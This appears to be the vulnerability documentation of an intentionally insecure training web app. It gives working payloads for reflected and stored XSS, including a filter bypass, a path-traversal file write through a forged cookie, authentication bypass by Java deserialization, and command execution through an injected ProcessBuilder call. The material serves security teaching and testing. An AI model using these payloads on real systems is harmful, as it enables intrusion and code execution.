## Vulnerabilities in the code:

#### XSS 

##### Reflected
The "hidden" folder `debug` can be found through the robots.txt (`http://localhost:8081/robots.txt`).

The XSS can be triggered through following request:
```
http://localhost:8081/debug?firstName=a&lastName=b&dateOfBirth=123&ssn=123&tin=123&phoneNumber=5432<scriscriptpt>alert(1)</sscriptcript>
```

The related method, filters the word "script". Yet it is still possible to trigger the XSS with adding an extra script into the request, like  `<scriscriptpt>` -> `<script>`.

##### Stored XSS
The payload `<img src=x onerror=alert(1)>`, 
```
http://localhost:8081/debug?firstName=a&lastName=b&dateOfBirth=2017-11-22&ssn=123&tin=123&phoneNumber=5432<img src=x onerror=alert(1)>
```

The XSS will be triggered, through the search on `http://localhost:8081/`.

#### Arbitrary file write

Ths request below, stores "abc" in a file named "testfile". The payload is in the cookie, which is structured in with this schema:
base64(filename, value1, value2, ...), md5sum(base64(filename, value1, value2, ...)). If the file exists, the values, including the md5sum, will be appended.
```
GET /saveSettings HTTP/1.1
Host: localhost:8081
Connection: close
Cookie: settings=dGVzdGZpbGUsYWJjCg==,ebf1a03f3fe96adf4d59e01656a507e4
```
An exploit, written in python, can be found in `exploits/filewriteexploit.py`. 

This is an example invocation of the script and should store a `testfile` with the content `filecontent` into the static folder.

`python2 filewriteexploit.py http://localhost:8081/saveSettings testfile filecontent`

The file can be stored in other folders using relative paths. 

`python2 filewriteexploit.py http://localhost:8081/saveSettings ../../testfile filecontent`

#### Authentication bypass

An authentication token is attacker controllable. This input is never checked, therefore the attacker can serialize his own authentication token and set the user role to admin.

An exploit can be found in the folder exploits/JavaSerializationExploit/exploit.py. It takes no parameter. 

A successful output looks like:
```
$ python2 exploit.py 
Customer;Month;Volume
Netflix;January;200,000
Palo Alto;January;200,000

```
#### RCE


The following example exploits the exec() to run an arbitrary command.  
The remote code execution can be triggered through a POST request. The payload inside the body can be altered.
```
curl -i -H "Content-Type: application/json" -X POST 
-d "new java.lang.ProcessBuilder({'/bin/bash','-c','echo "3vilhax0r">/tmp/hacked'}).start()" 
http://localhost:8081/search/user

```
Executing the above command a file in /tmp/hacked will be created indicating the successful exploitation


RCE involving a deserialization issue, it is similar to the [Authentication bypass](@Authentication bypass) one 
but this time the bug is exploited in order to get RCE instead of auth bypass.

The exploit can be found in  exploits/JavaSerializationExploit/exploitRCE.py.
For the sake of simplicity an Evil class is included within the application's classpath, the attacker exploits that
class to achieve RCE.



